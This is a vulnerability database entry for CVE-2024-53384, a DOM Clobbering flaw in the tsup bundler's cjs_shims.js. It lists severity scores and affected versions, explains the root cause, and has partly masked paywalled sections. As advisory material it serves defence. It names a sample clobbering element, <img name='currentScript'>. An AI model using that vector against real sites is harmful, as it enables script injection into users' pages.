Miggo Logo
Miggo Vulnerability Database
CVE-2024-53384

CVE-2024-53384: tsup DOM Clobbering vulnerability

5.1

CVSS Score
3.1

Basic Information

CVE ID
CVE-2024-53384
GHSA ID
GHSA-3mv9-4h5g-vhg3
EPSS Score
0.23629%
CWE
CWE-79
Published
3/3/2025
Updated
3/3/2025
KEV Status
No
Technology
TechnologyJavaScript

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
tsupnpm<= 8.3.4

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from tsup's handling of import.meta.url in browser contexts. The getImportMetaUrl function in cjs_shims.js directly references document.currentScript.src, which can be clobbered by attacker-controlled DOM elements (e.g., <img name='currentScript'>). This bypasses security checks as the code doesn't verify if document.currentScript is a valid <script> element. The GitHub Gist proof-of-concept and technical analysis confirm this pattern matches known DOM Clobbering attack vectors.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

* *OM *lo***rin* vuln*r**ility in tsup v*.*.* *llows *tt**k*rs to *x**ut* *r*itr*ry *o** vi* * *r**t** s*ript in t** import.m*t*.url to *o*um*nt.*urr*ntS*ript in *js_s*ims.js *ompon*nts

Reasoning

T** vuln*r**ility st*ms *rom tsup's **n*lin* o* `import.m*t*.url` in *rows*r *ont*xts. T** `**tImportM*t*Url` *un*tion in `*js_s*ims.js` *ir**tly r***r*n**s `*o*um*nt.*urr*ntS*ript.sr*`, w*i** **n ** *lo***r** *y *tt**k*r-*ontroll** *OM *l*m*nts (*.*